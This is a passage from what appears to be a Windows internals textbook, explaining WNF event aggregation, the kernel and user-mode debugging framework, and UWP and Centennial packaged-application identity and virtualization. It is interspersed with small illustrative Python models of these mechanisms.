-------------------------------------------------------------------------------------------
WNF_SHEL_DESKTOP_APPLICATION_STARTED | S | W | N | RW | I | 28 | 512
65 00 3A 00 6E 00 6F 00-74 00 65 00 70 00 61 00 e.:.n.o.t.e.p.a.
64 00 2E 00 65 00 78 00-65 00 00 00 d...e.x.e...
Because this event is associated with Explorer (the shell) starting desktop applications, you will
see one of the last applications you double-clicked, used the Start menu or Run menu for, or, in
general, anything that the ShellExecute API was used on. The change stamp is also shown, which
will end up a counter of how many desktop applications have been started this way since booting
this instance of Windows (as this is a persistent, but not permanent, event).
2. Launch a new desktop application such as Paint by using the Start menu and try the wnfdump command again. You should see the change stamp incremented and new binary data shown.
WNF event aggregation
Although WNF on its own provides a powerful way for clients and services to exchange state informa-
tion and be notified of each other’s statuses, there may be situations where a given client/subscriber is
interested in more than a single WNF state name.
For example, there may be a WNF state name that is published whenever the screen backlight
is off, another when the wireless card is powered off, and yet another when the user is no longer
physically present. A subscriber may want to be notified when all of these WNF state names have
been published—yet another may require a notification when either the first two or the latter
has been published.
Unfortunately, the WNF system calls and infrastructure provided by Ntdll.dll to user-mode cli-
ents (and equally, the API surface provided by the kernel) only operate on single WNF state names.
Therefore, the kinds of examples given would require manual handling through a state machine that
each subscriber would need to implement.
To facilitate this common requirement, a component exists both in user mode as well as in kernel
mode that handles the complexity of such a state machine and exposes a simple API: the Common
Event Aggregator (CEA) implemented in CEA.SYS for kernel-mode callers and EventAggregation.dll
for user-mode callers. These libraries export a set of APIs (such as EaCreateAggregatedEvent and EaSignalAggregatedEvent), which allow an interrupt-type behavior (a start callback while a WNF state is true, and a stop callback once the WNF state is false) as well as the combination of conditions with operators such as AND, OR, and NOT.
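The start/stop edge-triggered behavior combined with boolean operators can be sketched in a few lines. This is a toy model in the spirit of CEA, not its real API (the class and callback names are invented):

```python
class AggregatedEvent:
    """Fire a start callback when a boolean combination of states becomes
    true, and a stop callback when it becomes false again (edge-triggered)."""

    def __init__(self, predicate, on_start, on_stop):
        self.predicate = predicate   # AND/OR/NOT combination over the states
        self.on_start = on_start
        self.on_stop = on_stop
        self.states = {}
        self.active = False

    def signal(self, name, value):
        self.states[name] = value
        now = self.predicate(self.states)
        if now and not self.active:
            self.on_start()              # condition just became true
        elif not now and self.active:
            self.on_stop()               # condition just became false
        self.active = now

# "Backlight off AND (wireless off OR user absent)"
events = []
agg = AggregatedEvent(
    lambda s: s.get("backlight_off", False) and
              (s.get("wireless_off", False) or not s.get("user_present", True)),
    on_start=lambda: events.append("start"),
    on_stop=lambda: events.append("stop"),
)
agg.signal("backlight_off", True)
agg.signal("user_present", False)    # predicate becomes true
agg.signal("backlight_off", False)   # predicate becomes false again
```

Each `signal` call here stands in for a WNF state change notification; the aggregator keeps the state machine so that individual subscribers do not have to.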
Users of CEA include the USB Stack as well as the Windows Driver Foundation (WDF), which exposes
a framework callback for WNF state name changes. Further, the Power Delivery Coordinator (Pdc.sys)
uses CEA to build power state machines like the example at the beginning of this subsection. The
Unified Background Process Manager (UBPM) described in Chapter 9 also relies on CEA to implement
capabilities such as starting and stopping services based on low power and/or idle conditions.
Finally, WNF is also integral to a service called the System Event Broker (SEB), implemented in
SystemEventsBroker.dll and whose client library lives in SystemEventsBrokerClient.dll. The latter exports
APIs such as SebRegisterPrivateEvent, SebQueryEventData, and SebSignalEvent, which are then passed
through an RPC interface to the service. In user mode, SEB is a cornerstone of the Universal Windows
Platform (UWP) and the various APIs that interrogate system state, and services that trigger themselves
based on certain state changes that WNF exposes. Especially on OneCore-derived systems such as
Windows Phone and XBOX (which, as was shown earlier, make up more than a few hundred of the well-
known WNF state names), SEB is a central powerhouse of system notification capabilities, replacing
the legacy role that the Window Manager provided through messages such as WM_DEVICEARRIVAL,
WM_SESSIONENDCHANGE, WM_POWER, and others.
SEB pipes into the Broker Infrastructure (BI) used by UWP applications and allows applications, even
when running under an AppContainer, to access WNF events that map to systemwide state. In turn, for
WinRT applications, the Windows.ApplicationModel.Background namespace exposes a SystemTrigger
class, which implements IBackgroundTrigger, that pipes into the SEB’s RPC services and C++ API, for
certain well-known system events, which ultimately transforms to WNF_SEB_XXX event state names.
It serves as a perfect example of how something highly undocumented and internal, such as WNF, can
ultimately be at the heart of a high-level documented API for Modern UWP application development.
SEB is only one of the many brokers that UWP exposes, and at the end of the chapter, we cover back-
ground tasks and the Broker Infrastructure in full detail.
User-mode debugging
Support for user-mode debugging is split into three different modules. The first one is located in the
executive itself and has the prefix Dbgk, which stands for Debugging Framework. It provides the neces-
sary internal functions for registering and listening for debug events, managing the debug object, and
packaging the information for consumption by its user-mode counterpart. The user-mode component
that talks directly to Dbgk is located in the native system library, Ntdll.dll, under a set of APIs that begin
with the prefix DbgUi. These APIs are responsible for wrapping the underlying debug object implemen-
tation (which is opaque), and they allow all subsystem applications to use debugging by wrapping their
own APIs around the DbgUi implementation. Finally, the third component in user-mode debugging
belongs to the subsystem DLLs. It is the exposed, documented API (located in KernelBase.dll for the
Windows subsystem) that each subsystem supports for performing debugging of other applications.
Kernel support
The kernel supports user-mode debugging through an object mentioned earlier: the debug object. It
provides a series of system calls, most of which map directly to the Windows debugging API, typically
accessed through the DbgUi layer first. The debug object itself is a simple construct, composed of a
series of flags that determine state, an event to notify any waiters that debugger events are present,
a doubly linked list of debug events waiting to be processed, and a fast mutex used for locking the
object. This is all the information that the kernel requires for successfully receiving and sending debug-
ger events, and each debugged process has a debug port member in its executive process structure
pointing to this debug object.
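The debug object just described can be modeled in a few lines. The following is a toy Python sketch, not kernel code: a lock protecting a queue of pending debug events, plus an event that wakes any waiters when work is available.

```python
from collections import deque
from threading import Event, Lock

class DebugObject:
    """Toy model of the executive's debug object (illustrative only)."""

    def __init__(self):
        self.flags = 0
        self.event = Event()   # notifies waiters that debug events are present
        self.queue = deque()   # doubly linked list of pending debug events
        self.lock = Lock()     # stands in for the fast mutex

    def insert_event(self, dbg_event):
        with self.lock:
            self.queue.append(dbg_event)
            self.event.set()

    def wait_for_event(self):
        self.event.wait()
        with self.lock:
            dbg_event = self.queue.popleft()
            if not self.queue:         # nothing left pending
                self.event.clear()
            return dbg_event
```

A debugger loop repeatedly calls the equivalent of `wait_for_event`, processes the message, and continues the debuggee, which is essentially what the DbgUi wait APIs wrap.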
Once a process has an associated debug port, the events described in Table 8-32 can cause a debug
event to be inserted into the list of events.
Apart from the causes mentioned in the table, there are a couple of special triggering cases outside
the regular scenarios that occur at the time a debugger object first becomes associated with a pro-
cess. The first create process and create thread messages will be manually sent when the debugger is
attached, first for the process itself and its main thread and followed by create thread messages for all
the other threads in the process. Finally, load dll events for the executable being debugged, starting
with Ntdll.dll and then all the current DLLs loaded in the debugged process will be sent. Similarly, if a
debugger is already attached, but a cloned process (fork) is created, the same events will also be sent
for the first thread in the clone (as instead of just Ntdll.dll, all other DLLs are also present in the cloned
address space).
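The attach-time message sequence described above can be sketched as a small model. This is an illustration of the ordering only (the helper name and tuple shapes are invented, not a real API):

```python
# Illustrative model of the synthetic debug messages sent when a debugger
# attaches to an already-running process: one create-process message for the
# process and its main thread, create-thread messages for the remaining
# threads, then load-dll messages starting with Ntdll.dll.

def attach_event_sequence(thread_ids, loaded_dlls):
    """thread_ids: all threads in the process, first entry is the main thread.
    loaded_dlls: DLLs currently mapped in the process, excluding ntdll.dll."""
    events = []
    # The first create-process message covers the process and its main thread.
    events.append(("create_process", thread_ids[0]))
    # Then a create-thread message for every other thread in the process.
    for tid in thread_ids[1:]:
        events.append(("create_thread", tid))
    # Finally, load-dll messages, starting with Ntdll.dll.
    events.append(("load_dll", "ntdll.dll"))
    for dll in loaded_dlls:
        events.append(("load_dll", dll))
    return events

seq = attach_event_sequence([100, 104, 108], ["kernelbase.dll", "kernel32.dll"])
```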
There also exists a special flag that can be set on a thread, either during creation or dynamically, called hide from debugger. When this flag is turned on, which results in the HideFromDebugger flag in the TEB being set, no operation performed by the current thread, even if the process has a debug port, will result in a debugger message.
240
CHAPTER 8 System mechanisms
TABLE 8-32 Kernel-mode debugging events
Event Identifier
Meaning
Triggered By
DbgKmExceptionApi
An exception has occurred.
KiDispatchException during an exception that occurred in
user mode.
DbgKmCreateThreadApi
A new thread has been created.
Startup of a user-mode thread.
DbgKmCreateProcessApi
A new process has been created.
Startup of a user-mode thread that is the first thread in
the process, if the CreateReported flag is not already set
in EPROCESS.
DbgKmExitThreadApi
A thread has exited.
Death of a user-mode thread, if the ThreadInserted flag is
set in ETHREAD.
DbgKmExitProcessApi
A process has exited.
Death of a user-mode thread that was the last thread in
the process, if the ThreadInserted flag is set in ETHREAD.
DbgKmLoadDllApi
A DLL was loaded.
NtMapViewOfSection when the section is an image file
(could be an EXE as well), if the SuppressDebugMsg flag is
not set in the TEB.
DbgKmUnloadDllApi
A DLL was unloaded.
NtUnmapViewOfSection when the section is an image file
(could be an EXE as well), if the SuppressDebugMsg flag is
not set in the TEB.
DbgKmErrorReportApi
A user-mode exception must be
forwarded to WER.
This special case message is sent over ALPC, not the de-
bug object, if the DbgKmExceptionApi message returned
DBG_EXCEPTION_NOT_HANDLED, so that WER can now
take over exception processing.
Once a debugger object has been associated with a process, the process enters the deep freeze state
that is also used for UWP applications. As a reminder, this suspends all threads and prevents any new
remote thread creation. At this point, it is the debugger’s responsibility to start requesting that debug
events be sent through. Debuggers usually request that debug events be sent back to user mode by
performing a wait on the debug object. This call loops through the list of debug events. As each request is removed from the list, its contents are converted from the internal DBGK structure to the native structure
that the next layer up understands. As you’ll see, this structure is different from the Win32 structure as
well, and another layer of conversion has to occur. Even after all pending debug messages have been
processed by the debugger, the kernel does not automatically resume the process. It is the debugger’s
responsibility to call the ContinueDebugEvent function to resume execution.
Apart from some more complex handling of certain multithreading issues, the basic model for
the framework is a simple matter of producers—code in the kernel that generates the debug events
in the previous table—and consumers—the debugger waiting on these events and acknowledging
their receipt.
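The debug object's parts, as enumerated above (state flags, a notification event, a locked list of pending events), map naturally onto a producer/consumer sketch. The following is an illustrative model in Python, not the kernel's actual code:

```python
import threading
from collections import deque

# Illustrative model of the debug object described in the text: a
# lock-protected event list plus a notification event, with producers
# (kernel-side event sources) and a consumer (the debugger's wait loop).

class DebugObject:
    def __init__(self):
        self.lock = threading.Lock()          # models the fast mutex
        self.wake = threading.Event()         # models the notification event
        self.pending = deque()                # models the linked list of events

    def post(self, event):                    # producer side
        with self.lock:
            self.pending.append(event)
            self.wake.set()

    def wait_for_event(self, timeout=None):   # consumer side
        if not self.wake.wait(timeout):
            return None                       # no debugger events arrived
        with self.lock:
            event = self.pending.popleft()
            if not self.pending:              # nothing left: reset the event
                self.wake.clear()
        return event

dbg = DebugObject()
dbg.post("DbgKmCreateProcessApi")
dbg.post("DbgKmLoadDllApi")
first = dbg.wait_for_event(1.0)
```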
Native support
Although the basic protocol for user-mode debugging is quite simple, it’s not directly usable by
Windows applications—instead, it’s wrapped by the DbgUi functions in Ntdll.dll. This abstraction is
required to allow native applications, as well as different subsystems, to use these routines (because
code inside Ntdll.dll has no dependencies). The functions that this component provides are mostly
analogous to the Windows API functions and related system calls. Internally, the code also provides
the functionality required to create a debug object associated with the thread. The handle to a debug
object that is created is never exposed. It is saved instead in the thread environment block (TEB) of the
debugger thread that performs the attachment. (For more information on the TEB, see Chapter 4 of
Part 1.) This value is saved in the DbgSsReserved[1] field.
When a debugger attaches to a process, it expects the process to be broken into—that is, an int 3
(breakpoint) operation should have happened, generated by a thread injected into the process. If this
didn’t happen, the debugger would never actually be able to take control of the process and would
merely see debug events flying by. Ntdll.dll is responsible for creating and injecting that thread into the
target process. Note that this thread is created with a special flag, which the kernel sets on the TEB, which results in the SkipThreadAttach flag being set, avoiding DLL_THREAD_ATTACH notifications and TLS slot usage, which could cause unwanted side effects each time a debugger breaks into the process.
Finally, Ntdll.dll also provides APIs to convert the native structure for debug events into the struc-
ture that the Windows API understands. This is done by following the conversions in Table 8-33.
TABLE 8-33 Native to Win32 conversions
Native State Change
Win32 State Change
Details
DbgCreateThreadStateChange
CREATE_THREAD_DEBUG_EVENT
DbgCreateProcessStateChange
CREATE_PROCESS_DEBUG_EVENT
lpImageName is always NULL, and fUnicode is
always TRUE.
DbgExitThreadStateChange
EXIT_THREAD_DEBUG_EVENT
DbgExitProcessStateChange
EXIT_PROCESS_DEBUG_EVENT
DbgExceptionStateChange
DbgBreakpointStateChange
DbgSingleStepStateChange
OUTPUT_DEBUG_STRING_EVENT,
RIP_EVENT, or
EXCEPTION_DEBUG_EVENT
Determination is based on the Exception Code
(which can be DBG_PRINTEXCEPTION_C /
DBG_PRINTEXCEPTION_WIDE_C,
DBG_RIPEXCEPTION, or something else).
DbgLoadDllStateChange
LOAD_DLL_DEBUG_EVENT
fUnicode is always TRUE
DbgUnloadDllStateChange
UNLOAD_DLL_DEBUG_EVENT
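The Table 8-33 conversions can be expressed as a lookup plus one exception-code check. The sketch below is illustrative; the DBG_* constant values are the documented Win32 exception codes, but the function itself is an invented helper, not DbgUi's real implementation:

```python
# Sketch of the native-to-Win32 state-change mapping in Table 8-33. The three
# exception-related native state changes fold into one of three Win32 events
# depending on the exception code.

DBG_PRINTEXCEPTION_C = 0x40010006
DBG_PRINTEXCEPTION_WIDE_C = 0x4001000A
DBG_RIPEXCEPTION = 0x40010007

DIRECT = {
    "DbgCreateThreadStateChange": "CREATE_THREAD_DEBUG_EVENT",
    "DbgCreateProcessStateChange": "CREATE_PROCESS_DEBUG_EVENT",
    "DbgExitThreadStateChange": "EXIT_THREAD_DEBUG_EVENT",
    "DbgExitProcessStateChange": "EXIT_PROCESS_DEBUG_EVENT",
    "DbgLoadDllStateChange": "LOAD_DLL_DEBUG_EVENT",
    "DbgUnloadDllStateChange": "UNLOAD_DLL_DEBUG_EVENT",
}

def to_win32(state_change, exception_code=None):
    if state_change in DIRECT:
        return DIRECT[state_change]
    # DbgExceptionStateChange, DbgBreakpointStateChange, and
    # DbgSingleStepStateChange: determination is based on the exception code.
    if exception_code in (DBG_PRINTEXCEPTION_C, DBG_PRINTEXCEPTION_WIDE_C):
        return "OUTPUT_DEBUG_STRING_EVENT"
    if exception_code == DBG_RIPEXCEPTION:
        return "RIP_EVENT"
    return "EXCEPTION_DEBUG_EVENT"
```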
EXPERIMENT: Viewing debugger objects
Although you’ve been using WinDbg to do kernel-mode debugging, you can also use it to de-
bug user-mode programs. Go ahead and try starting Notepad.exe with the debugger attached
using these steps:
1.
Run WinDbg, and then click File, Open Executable.
2.
Navigate to the \Windows\System32\ directory and choose Notepad.exe.
3.
You’re not going to do any debugging, so simply ignore whatever might come up.
You can type g in the command window to instruct WinDbg to continue executing
Notepad.
Now run Process Explorer and be sure the lower pane is enabled and configured to show
open handles. (Select View, Lower Pane View, and then Handles.) You also want to look at un-
named handles, so select View, Show Unnamed Handles And Mappings.
Next, click the Windbg.exe (or EngHost.exe, if you’re using the WinDbg Preview) process
and look at its handle table. You should see an open, unnamed handle to a debug object. (You
can organize the table by Type to find this entry more readily.) You should see something like
the following:
You can try right-clicking the handle and closing it. Notepad should disappear, and the
following message should appear in WinDbg:
ERROR: WaitForEvent failed, NTSTATUS 0xC0000354
This usually indicates that the debuggee has been
killed out from underneath the debugger.
You can use .tlist to see if the debuggee still exists.
In fact, if you look at the description for the NTSTATUS code given, you will find the text: “An
attempt to do an operation on a debug port failed because the port is in the process of being
deleted,” which is exactly what you’ve done by closing the handle.
As you can see, the native DbgUi interface doesn’t do much work to support the framework except
for this abstraction. The most complicated task it does is the conversion between native and Win32
debugger structures. This involves several additional changes to the structures.
Windows subsystem support
The final component responsible for allowing debuggers such as Microsoft Visual Studio or WinDbg to
debug user-mode applications is in KernelBase.dll. It provides the documented Windows APIs. Apart
from this trivial conversion of one function name to another, there is one important management
job that this side of the debugging infrastructure is responsible for: managing the duplicated file and
thread handles.
Recall that each time a load DLL event is sent, a handle to the image file is duplicated by the kernel
and handed off in the event structure, as is the case with the handle to the process executable dur-
ing the create process event. During each wait call, KernelBase.dll checks whether this is an event that
results in a new duplicated process and/or thread handles from the kernel (the two create events). If so,
it allocates a structure in which it stores the process ID, thread ID, and the thread and/or process handle
associated with the event. This structure is linked into the first DbgSsReserved array index in the TEB,
where we mentioned the debug object handle is stored. Likewise, KernelBase.dll also checks for exit
events. When it detects such an event, it “marks” the handles in the data structure.
Once the debugger is finished using the handles and performs the continue call, KernelBase.dll
parses these structures, looks for any handles whose threads have exited, and closes the handles for
the debugger. Otherwise, those threads and processes would never exit because there would always be
open handles to them if the debugger were running.
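The handle bookkeeping just described can be modeled as follows. This is an illustrative sketch with invented names, not KernelBase.dll's actual data structures:

```python
# Illustrative model of KernelBase.dll's duplicated-handle bookkeeping:
# create events record the duplicated handles, exit events "mark" them, and
# the continue call closes the handles of anything that has exited.

class HandleTracker:
    def __init__(self):
        self.records = []   # models the structure linked into DbgSsReserved[0]

    def on_create(self, pid, tid, handle):
        self.records.append({"pid": pid, "tid": tid,
                             "handle": handle, "exited": False})

    def on_exit(self, tid):
        for rec in self.records:
            if rec["tid"] == tid:
                rec["exited"] = True        # just mark it for now

    def on_continue(self, close_handle):
        # On continue, close and drop handles whose threads have exited.
        keep = []
        for rec in self.records:
            if rec["exited"]:
                close_handle(rec["handle"])
            else:
                keep.append(rec)
        self.records = keep

closed = []
tracker = HandleTracker()
tracker.on_create(pid=4, tid=8, handle=0x44)
tracker.on_create(pid=4, tid=12, handle=0x48)
tracker.on_exit(tid=8)
tracker.on_continue(closed.append)
```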
Packaged applications
Starting with Windows 8, there was a need for APIs that run on different kinds of devices, from a mobile phone up to an Xbox and a fully fledged personal computer. Windows was indeed starting
to be designed even for new device types, which use different platforms and CPU architectures (ARM
is a good example). A new platform-agnostic application architecture, Windows Runtime (also known
as “WinRT”) was first introduced in Windows 8. WinRT supported development in C++, JavaScript, and
managed languages (C#, VB.Net, and so on), was based on COM, and natively supported the x86, AMD64, and ARM processors. Universal Windows Platform (UWP) is the evolution of WinRT. It has been designed to overcome some limitations of WinRT and is built on top of it. UWP applications no longer need to indicate in their manifest which OS version they have been developed for; instead, they target one or more device families.
UWP provides Universal Device Family APIs, which are guaranteed to be present in all device fami-
lies, and Extension APIs, which are device specific. A developer can target one device type, adding the
extension SDK in its manifest; furthermore, she can conditionally test the presence of an API at runtime
and adapt the app’s behavior accordingly. In this way, a UWP app running on a smartphone may start
behaving the way it would if it were running on a PC when the phone is connected to a desktop com-
puter or a suitable docking station.
UWP provides multiple services to its apps:
I
Adaptive controls and input—the graphical elements respond to the size and DPI of the screen
by adjusting their layout and scale. Furthermore, the input handling is abstracted to the under-
lying app. This means that a UWP app works well on different screens and with different kinds
of input devices, like touch, a pen, a mouse, keyboard, or an Xbox controller
I
One centralized store for every UWP app, which provides a seamless install, uninstall, and
upgrade experience
I
A unified design system, called Fluent (integrated in Visual Studio)
I
A sandbox environment, which is called AppContainer
AppContainers were originally designed for WinRT and are still used for UWP applications. We
already covered the security aspects of AppContainers in Chapter 7 of Part 1.
To properly execute and manage UWP applications, a new application model has been built in
Windows, which is internally called AppModel and stands for “Modern Application Model.” The
Modern Application Model has evolved and has been changed multiple times during each release of
the OS. In this book, we analyze the Windows 10 Modern Application Model. Multiple components are
part of the new model and cooperate to correctly manage the states of the packaged application and
its background activities in an energy-efficient manner.
I
Host Activity Manager (HAM) The Host Activity Manager is a new component, introduced
in Windows 10, which replaces and integrates many of the old components that control the
life (and the states) of a UWP application (Process Lifetime Manager, Foreground Manager,
Resource Policy, and Resource Manager). The Host Activity Manager lives in the Background
Task Infrastructure service (BrokerInfrastructure), not to be confused with the Background
Broker Infrastructure component, and works deeply tied to the Process State Manager. It is
implemented in two different libraries, which represent the client (Rmclient.dll) and server
(PsmServiceExtHost.dll) interface.
I
Process State Manager (PSM) PSM has been partly replaced by HAM and is considered
part of the latter (actually PSM became a HAM client). It maintains and stores the state of
each host of the packaged application. It is implemented in the same service as the HAM (BrokerInfrastructure), but in a different DLL: Psmsrv.dll.
I
Application Activation Manager (AAM) AAM is the component responsible for the different kinds and types of activation of a packaged application. It is implemented in the
ActivationManager.dll library, which lives in the User Manager service. Application Activation
Manager is a HAM client.
I
View Manager (VM) VM detects and manages UWP user interface events and activities
and talks with HAM to keep the UI application in the foreground and in a nonsuspended state.
Furthermore, VM helps HAM in detecting when a UWP application goes into background
state. View Manager is implemented in the CoreUiComponents.dll .Net managed library, which
depends on the Modern Execution Manager client interface (ExecModelClient.dll) to properly
register with HAM. Both libraries live in the User Manager service, which runs in a Sihost process (the service needs to properly manage UI events).
I
Background Broker Infrastructure (BI) BI manages the applications' background tasks, their
execution policies, and events. The core server is implemented mainly in the bisrv.dll library,
manages the events that the brokers generate, and evaluates the policies used to decide whether
to run a background task. The Background Broker Infrastructure lives in the BrokerInfrastructure
service and, at the time of this writing, is not used for Centennial applications.
There are some other minor components that compose the new application model that we have not
mentioned here and are beyond the scope of this book.
With the goal of being able to run even standard Win32 applications on secure devices like Windows 10 S, and to enable the conversion of old applications to the new model, Microsoft has designed the Desktop Bridge (internally called Centennial). The bridge is available to developers through
Visual Studio or the Desktop App Converter. Running a Win32 application in an AppContainer, even if
possible, is not recommended, simply because the standard Win32 applications are designed to access
a wider system API surface, which is much reduced in AppContainers.
UWP applications
We already covered an introduction of UWP applications and described the security environment in
which they run in Chapter 7 of Part 1. To better understand the concepts expressed in this chapter, it is
useful to define some basic properties of the modern UWP applications. Windows 8 introduced signifi-
cant new properties for processes:
I
Package identity
I
Application identity
I
AppContainer
I
Modern UI
We have already extensively analyzed the AppContainer (see Chapter 7 in Part 1). When the user downloads a modern UWP application, it usually comes encapsulated in an AppX package.
A package can contain different applications that are published by the same author and are linked to-
gether. A package identity is a logical construct that uniquely defines a package. It is composed of five
parts: name, version, architecture, resource id, and publisher. The package identity can be represented
in two ways: by using a Package Full Name (formerly known as Package Moniker), which is a string
composed of all the single parts of the package identity, concatenated by an underscore character; or
by using a Package Family name, which is another string containing the package name and publisher.
The publisher is represented in both cases by using a Base32-encoded string of the full publisher name.
In the UWP world, the terms “Package ID” and “Package full name” are equivalent. For example, the
Adobe Photoshop package is distributed with the following full name:
AdobeSystemsIncorporated.AdobePhotoshopExpress_2.6.235.0_neutral_split.scale-125_
ynb6jyjzte8ga, where
I
AdobeSystemsIncorporated.AdobePhotoshopExpress is the name of the package.
I
2.6.235.0 is the version.
I
neutral is the targeting architecture.
I
split.scale-125 is the resource id.
I
ynb6jyjzte8ga is the base32 encoding (Crockford’s variant, which excludes the letters i, l, u, and
o to avoid confusion with digits) of the publisher.
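The publisher hash in the last bullet can be derived as follows. This derivation is widely documented but is an assumption here, not something the text states: SHA-256 of the UTF-16LE publisher string, first 8 bytes, Crockford-Base32 encoded into 13 characters (the 64 hash bits plus one trailing zero bit make 65 bits, or thirteen 5-bit groups):

```python
import hashlib

# Crockford's Base32 alphabet: no i, l, o, or u, as noted in the text.
CROCKFORD = "0123456789abcdefghjkmnpqrstvwxyz"

def publisher_hash(publisher):
    """Sketch of the commonly documented package-family hash derivation
    (an assumption, not an official contract)."""
    digest = hashlib.sha256(publisher.encode("utf-16-le")).digest()[:8]
    bits = int.from_bytes(digest, "big") << 1   # append the zero padding bit
    # Emit thirteen 5-bit groups, most significant first.
    return "".join(CROCKFORD[(bits >> (5 * i)) & 31] for i in range(12, -1, -1))
```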
Its package family name is the simpler “AdobeSystemsIncorporated.AdobePhotoshopExpress
_ynb6jyjzte8ga” string.
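Because the five identity parts are joined by underscores, a package full name can be decomposed by splitting on that separator, and the family name recomposed from the name and publisher parts. A minimal sketch with hypothetical helper names:

```python
# The package full name is the five identity parts concatenated by an
# underscore; the family name keeps only the package name and publisher hash.

def parse_full_name(full_name):
    name, version, arch, resource_id, publisher = full_name.split("_")
    return {"name": name, "version": version, "architecture": arch,
            "resource_id": resource_id, "publisher_hash": publisher}

def family_name(full_name):
    parts = parse_full_name(full_name)
    return parts["name"] + "_" + parts["publisher_hash"]

full = ("AdobeSystemsIncorporated.AdobePhotoshopExpress_2.6.235.0_"
        "neutral_split.scale-125_ynb6jyjzte8ga")
```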
Every application that composes the package is represented by an application identity. An applica-
tion identity uniquely identifies the collection of windows, processes, shortcuts, icons, and functionality
that form a single user-facing program, regardless of its actual implementation (so this means that in
the UWP world, a single application can be composed of different processes that are still part of the
same application identity). The application identity is represented by a simple string (in the UWP world,
called Package Relative Application ID, often abbreviated as PRAID). The latter is always combined with
the package family name to compose the Application User Model ID (often abbreviated as AUMID). For
example, the Windows modern Start menu application has the following AUMID: Microsoft.Windows.
ShellExperienceHost_cw5n1h2txyewy!App, where the App part is the PRAID.
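The AUMID composition just described is a simple concatenation, sketched below (the helper name is invented):

```python
# An AUMID is the package family name and the PRAID joined by "!".

def aumid(package_family_name, praid):
    return f"{package_family_name}!{praid}"

# The Start menu example from the text:
start_menu = aumid("Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", "App")
```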
Both the package full name and the application identity are located in the WIN://SYSAPPID Security
attribute of the token that describes the modern application security context. For an extensive descrip-
tion of the security environment in which the UWP applications run, refer to Chapter 7 in Part 1.
Centennial applications
Starting from Windows 10, the new application model became compatible with standard Win32 applica-
tions. The only procedure that the developer needs to do is to run the application installer program with
a special Microsoft tool called Desktop App Converter. The Desktop App Converter launches the installer
under a sandboxed server Silo (internally called Argon Container) and intercepts all the file system and
registry I/O that is needed to create the application package, storing all its files in VFS (virtualized file
system) private folders. Entirely describing the Desktop App Converter application is outside the scope of
this book. You can find more details of Windows Containers and Silos in Chapter 3 of Part 1.
The Centennial runtime, unlike UWP applications, does not create a sandbox where Centennial
processes are run, but only applies a thin virtualization layer on top of them. As a result, compared
to standard Win32 programs, Centennial applications don’t have lower security capabilities, nor do
they run with a lower integrity-level token. A Centennial application can even be launched under
an administrative account. This kind of application runs in application silos (internally called Helium
Container), which, with the goal of providing State separation while maintaining compatibility, provides
two forms of “jails”: Registry Redirection and Virtual File System (VFS). Figure 8-42 shows an example of
a Centennial application: Kali Linux.
At package activation, the system applies registry redirection to the application and merges the
main system hives with the Centennial Application registry hives. Each Centennial application can
include three different registry hives when installed in the user workstation: registry.dat, user.dat,
and (optionally) userclasses.dat. The registry files generated by the Desktop App Converter represent "immutable" hives, which are written at installation time and should not change. At application startup,
the Centennial runtime merges the immutable hives with the real system registry hives (actually, the
Centennial runtime executes a “detokenizing” procedure because each value stored in the hive con-
tains relative values).
FIGURE 8-42 Kali Linux distributed on the Windows Store is a typical example of Centennial application.
The registry merging and virtualization services are provided by the Virtual Registry Namespace
Filter driver (WscVReg), which is integrated in the NT kernel (Configuration Manager). At package
activation time, the user-mode AppInfo service communicates with the VRegDriver device with the
goal of merging and redirecting the registry activity of the Centennial applications. In this model, if the
app tries to read a registry value that is present in the virtualized hives, the I/O is actually redirected to
the package hives. A write operation to this kind of value is not permitted. If the value does not already
exist in the virtualized hive, it is created in the real hive without any kind of redirection at all. A different
kind of redirection is instead applied to the entire HKEY_CURRENT_USER root key. In this key, each new
subkey or value is stored only in the package hive that is stored in the following path: C:\ProgramData\
Packages\<PackageName>\<UserSid>\SystemAppData\Helium\Cache. Table 8-34 shows a summary of
the Registry virtualization applied to Centennial applications:
TABLE 8-34 Registry virtualization applied to Centennial applications
Operation
Result
Read or enumeration of HKEY_
LOCAL_MACHINE\Software
The operation returns a dynamic merge of the package hives with the local
system counterpart. Registry keys and values that exist in the package hives
always have precedence with respect to keys and values that already exist in
the local system.
All writes to HKEY_CURRENT_USER
Redirected to the Centennial package virtualized hive.
All writes inside the package
Writes to HKEY_LOCAL_MACHINE\Software are not allowed if a registry value
exists in one of the package hives.
All writes outside the package
Writes to HKEY_LOCAL_MACHINE\Software are allowed as long as the value
does not already exist in one of the package hives.
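The decisions in Table 8-34 can be condensed into a small function. This is an illustrative sketch with invented result names; the handling of HKEY_CURRENT_USER reads as a merged view is an assumption inferred from the surrounding text:

```python
# Decision sketch for Centennial registry virtualization (Table 8-34).

def registry_result(operation, key, in_package_hive):
    if key.startswith("HKEY_CURRENT_USER"):
        if operation == "write":
            return "redirect-to-package-hive"   # stored only in the package hive
        return "merged-view"                    # assumed: reads see the merge
    if key.startswith("HKEY_LOCAL_MACHINE\\Software"):
        if operation == "read":
            return "merged-view"                # package hives take precedence
        # Writes: forbidden if the value lives in a package hive; otherwise
        # they go to the real hive with no redirection at all.
        return "denied" if in_package_hive else "real-hive"
    return "real-hive"
```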
When the Centennial runtime sets up the Silo application container, it walks all the files and directories located in the VFS folder of the package. This procedure is part of the Centennial Virtual File System configuration that the package activation provides. The Centennial runtime includes a list of mappings for each folder located in the VFS directory, as shown in Table 8-35.
TABLE 8-35 List of system folders that are virtualized for Centennial apps
Folder Name
Redirection Target
Architecture
SystemX86
C:\Windows\SysWOW64
32-bit/64-bit
System
C:\Windows\System32
32-bit/64-bit
SystemX64
C:\Windows\System32
64-bit only
ProgramFilesX86
C:\Program Files (x86)
32-bit/64-bit
ProgramFilesX64
C:\Program Files
64-bit only
ProgramFilesCommonX86
C:\Program Files (x86)\Common Files
32-bit/64-bit
ProgramFilesCommonX64
C:\Program Files\Common Files
64-bit only
Windows
C:\Windows
Neutral
CommonAppData
C:\ProgramData
Neutral
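The Table 8-35 mapping lends itself to a simple data-driven resolver. The sketch below assumes the 64-bit layout from the table (the resolver function itself is hypothetical):

```python
# Table 8-35 as data: VFS folder name -> redirection target (64-bit layout).
VFS_MAP = {
    "SystemX86": "C:\\Windows\\SysWOW64",
    "System": "C:\\Windows\\System32",
    "SystemX64": "C:\\Windows\\System32",
    "ProgramFilesX86": "C:\\Program Files (x86)",
    "ProgramFilesX64": "C:\\Program Files",
    "ProgramFilesCommonX86": "C:\\Program Files (x86)\\Common Files",
    "ProgramFilesCommonX64": "C:\\Program Files\\Common Files",
    "Windows": "C:\\Windows",
    "CommonAppData": "C:\\ProgramData",
}

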